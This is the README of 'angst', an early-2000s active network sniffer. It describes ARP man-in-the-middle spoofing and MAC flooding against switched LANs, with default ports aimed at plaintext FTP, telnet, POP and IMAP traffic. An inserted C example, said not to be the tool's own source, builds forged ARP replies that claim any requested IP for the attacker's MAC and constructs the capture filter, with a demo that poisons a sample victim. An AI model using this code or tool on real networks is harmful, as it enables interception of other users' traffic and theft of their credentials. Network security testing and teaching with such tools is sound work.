angst - an active sniffer
by Patroklos Argyroudis

[ Introduction ]

Angst is an active sniffer, based on libpcap and libnet. Angst provides
methods for aggressive sniffing on switched local area network
environments. It dumps the payload of all the TCP packets received on
the specified ports. Moreover, it implements methods for active sniffing.

Angst currently provides two active sniffing methods. The first monitors
ARP requests, and after enabling IP forwarding on the local host, sends
ARP replies mapping all IPs to the local MAC address, so that traffic
between the hosts on the segment is sent to, and forwarded by, the
sniffing host. The second method floods the local network with random
MAC addresses (like macof v1.1 by Ian Vitek), causing switches to send
packets to all ports.

Made just for testing purposes and fun. If you compile it on any other
platform except the ones listed below, please contact me at the above
email address. As always, published under a BSD style license, see the
included LICENSE file.

[ Supported platforms ]

Angst has been thoroughly tested on the following platforms:

OpenBSD 2.8 (i386)
OpenBSD 2.7 (i386)
OpenBSD 2.6 (i386)

Also, angst is known to compile and run on:

FreeBSD 4.2-STABLE (i386)
NetBSD 1.4.2 (i386)
Slackware Linux 7.1, with 2.2.13 kernel (i386)

[ Compilation and installation ]

You must first build and install libpcap and libnet. BSD systems have
libpcap installed by default. If you test it on any other platform
except the ones mentioned, send me the diffs. It should be portable
since it is based on libpcap and libnet.

If you run {Free,Net,Open}BSD simply type:

make

If you run Linux type:

make -f Makefile.linux

In order to compile with debug support, edit the Makefile that
corresponds to your platform and remove the comment from -DDEBUG.

In order to install angst type:

make install

This will install the angst binary to /usr/local/sbin and the angst
manual page to /usr/local/man/man8.
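The following is an added example written for this README, not angst's own source. It shows the two pieces described above and in the Usage section below in working C: the "arp or (tcp and (dst port ...))" filter expression that the -e switch builds from a comma separated port list, and the Ethernet/ARP reply frame that the man-in-the-middle method injects in answer to an observed ARP request, claiming whatever IP was asked for at the local MAC address. The function names, the struct layout used to lay out the frame, and the MAC and IP addresses in main() are assumptions made for the example; sending the frame with libnet and capturing requests with libpcap is left out.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse a comma separated port list such as "23,25,113" into ports[].
   Returns the count, or -1 on an empty field, a non-numeric entry,
   a port outside 1..65535, or more than max entries. */
int parse_ports(const char *spec, unsigned short *ports, int max)
{
    int count = 0;
    while (*spec) {
        char *end;
        unsigned long v = strtoul(spec, &end, 10);
        if (end == spec || v == 0 || v > 65535) return -1;
        if (*end != ',' && *end != '\0') return -1;
        if (count == max) return -1;
        ports[count++] = (unsigned short)v;
        if (*end == ',' && end[1] == '\0') return -1;   /* trailing comma */
        spec = (*end == ',') ? end + 1 : end;
    }
    return count;
}

/* Build "arp or (tcp and (dst port A or dst port B ...))" into out.
   Returns the length, or -1 if there are no ports or out is too small.
   Only "dst port" terms are used, so the filter sees the client side of
   each connection (the direction that carries logins and commands). */
int build_filter(const unsigned short *ports, int nports,
                 char *out, size_t outlen)
{
    size_t pos;
    int i, n;
    if (nports <= 0) return -1;
    n = snprintf(out, outlen, "arp or (tcp and (");
    if (n < 0 || (size_t)n >= outlen) return -1;
    pos = (size_t)n;
    for (i = 0; i < nports; i++) {
        n = snprintf(out + pos, outlen - pos, "%sdst port %u",
                     i ? " or " : "", (unsigned)ports[i]);
        if (n < 0 || (size_t)n >= outlen - pos) return -1;
        pos += (size_t)n;
    }
    n = snprintf(out + pos, outlen - pos, "))");
    if (n < 0 || (size_t)n >= outlen - pos) return -1;
    return (int)(pos + (size_t)n);
}

/* Ethernet header followed by an ARP packet: 42 bytes, no padding since
   every member is a byte array. Multi-byte fields are big-endian. */
struct arp_frame {
    uint8_t eth_dst[6], eth_src[6], eth_type[2];    /* type 0x0806 */
    uint8_t htype[2], ptype[2], hlen, plen, op[2];  /* 1, 0x0800, 6, 4 */
    uint8_t sha[6], spa[4], tha[6], tpa[4];
};

/* Write a complete ARP frame (op 1 = request, 2 = reply) to buf, which
   must hold sizeof(struct arp_frame) bytes. Returns the length. */
size_t build_arp(uint8_t *buf, uint8_t op, const uint8_t eth_dst[6],
                 const uint8_t sha[6], const uint8_t spa[4],
                 const uint8_t tha[6], const uint8_t tpa[4])
{
    struct arp_frame f;
    memcpy(f.eth_dst, eth_dst, 6);
    memcpy(f.eth_src, sha, 6);
    f.eth_type[0] = 0x08; f.eth_type[1] = 0x06;                     /* ARP */
    f.htype[0] = 0; f.htype[1] = 1; f.ptype[0] = 0x08; f.ptype[1] = 0;
    f.hlen = 6; f.plen = 4; f.op[0] = 0; f.op[1] = op;
    memcpy(f.sha, sha, 6); memcpy(f.spa, spa, 4);
    memcpy(f.tha, tha, 6); memcpy(f.tpa, tpa, 4);
    memcpy(buf, &f, sizeof f);
    return sizeof f;
}

/* The man-in-the-middle method: for a captured ARP request "who has
   tpa?", answer the requester with "tpa is-at our_mac", whatever tpa is.
   Returns the reply length, or 0 if frame is not an ARP request. The
   kernel must forward IP (angst enables it unless -d is given), or the
   traffic redirected this way dies at the sniffing host. */
size_t answer_arp_request(const uint8_t *frame, size_t len,
                          const uint8_t our_mac[6], uint8_t *out)
{
    const struct arp_frame *rq = (const struct arp_frame *)frame;
    if (len < sizeof *rq) return 0;
    if (rq->eth_type[0] != 0x08 || rq->eth_type[1] != 0x06) return 0;
    if (rq->htype[1] != 1 || rq->hlen != 6 || rq->plen != 4) return 0;
    if (rq->op[0] != 0 || rq->op[1] != 1) return 0;
    return build_arp(out, 2, rq->sha, our_mac, rq->tpa, rq->sha, rq->spa);
}

int main(void)
{
    /* Constructed sample: victim 10.0.0.5 asks who has gateway 10.0.0.1;
       the MAC addresses are made up for the example. */
    const uint8_t bcast[6] = {0xff,0xff,0xff,0xff,0xff,0xff}, zero[6] = {0};
    const uint8_t victim[6] = {0x00,0x11,0x22,0x33,0x44,0x55};
    const uint8_t ours[6] = {0x00,0xaa,0xbb,0xcc,0xdd,0xee};
    const uint8_t vip[4] = {10,0,0,5}, gwip[4] = {10,0,0,1};
    uint8_t req[sizeof(struct arp_frame)], rep[sizeof(struct arp_frame)];
    unsigned short ports[16];
    char filter[256];
    int n = parse_ports("23,25,113", ports, 16);

    if (n > 0 && build_filter(ports, n, filter, sizeof filter) > 0)
        printf("warning: the filter expression is %s\n", filter);
    build_arp(req, 1, bcast, victim, vip, zero, gwip);
    if (answer_arp_request(req, sizeof req, ours, rep) == sizeof rep)
        printf("inject: %u.%u.%u.%u is-at %02x:%02x:%02x:%02x:%02x:%02x\n",
               rep[28], rep[29], rep[30], rep[31],
               rep[22], rep[23], rep[24], rep[25], rep[26], rep[27]);
    return 0;
}
```

The reply is unicast to the requester rather than broadcast, and it answers every request regardless of which IP is asked for, which is exactly why the sniffing host must forward: after the victim's ARP cache is poisoned, its packets for the gateway arrive at the local interface and go nowhere unless the kernel routes them on.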
To uninstall angst type:

make uninstall

[ Usage ]

By invoking angst with the -h switch you get the following help message:

[ angst - an active sniffer ]
[ Patroklos Argyroudis ]

usage: angst [active sniffing method] [active sniffing options] [options]

active sniffing methods:
[ -a man-in-the-middle ARP method ]
[ -f flood random MAC addresses method ]

active sniffing options:
[ -d don't try to enable IP forwarding on the local host ]
[ -s specify the seconds between each flooding for flood method,
     or the seconds between the injection of the fake ARP replies ]
[ -c specify the number of packets to flood, for flood method ]

options:
[ -h this help message ]
[ -p don't put the interface into promiscuous mode ]
[ -r resolve IP addresses ]
[ -v display the version number and exit ]
[ -i specify which interface to use ]
[ -l specify the log filename ]
[ -e specify the port numbers to build the filter expression ]

Note that there are default values for all the command line arguments.
In order to keep things cleaner, you cannot specify a filter expression
as a command line option. In order to monitor ports other than the
default ones (21, 23, 110, 143) you have to specify them with the -e
switch. The -e switch accepts comma separated numbers, and from them it
builds a correct filter expression. An example usage of the -e switch is:

# ./angst -a -e 23,25,113
warning: the filter expression is arp or (tcp and (dst port 23 or dst port 25 or dst port 113))

As you can see, angst always informs you about the filter expression
when the -e switch is used. Note that the expression only matches
packets sent to the listed ports, i.e. the client-to-server half of
each connection.

Moreover, in order for the man-in-the-middle ARP method to work, IP
forwarding must be enabled on the local host. The -d switch is useful
when you want to enable IP forwarding yourself, and not let angst do it
for you.

[ Download ]

You can find angst at:

http://ntrg.cs.tcd.ie/~argp/software/

and/or at:

http://angst.sourceforge.net/

[ Music ]

Hocico, Velvet Acid Christ, and Suicide Commando mostly.
[ Acknowledgments ]

Ioanna Stamouli, for support, discussions, and ideas.
Georgios Kargiotakis, for interesting discussions.
Jackal for his libpcap based code, some years ago.
Scut for his cool mail about the man-in-the-middle method.

--
Patroklos Argyroudis
http://ntrg.cs.tcd.ie/~argp/

$Id: README,v 1.35 2001/02/07 18:41:25 argp Exp $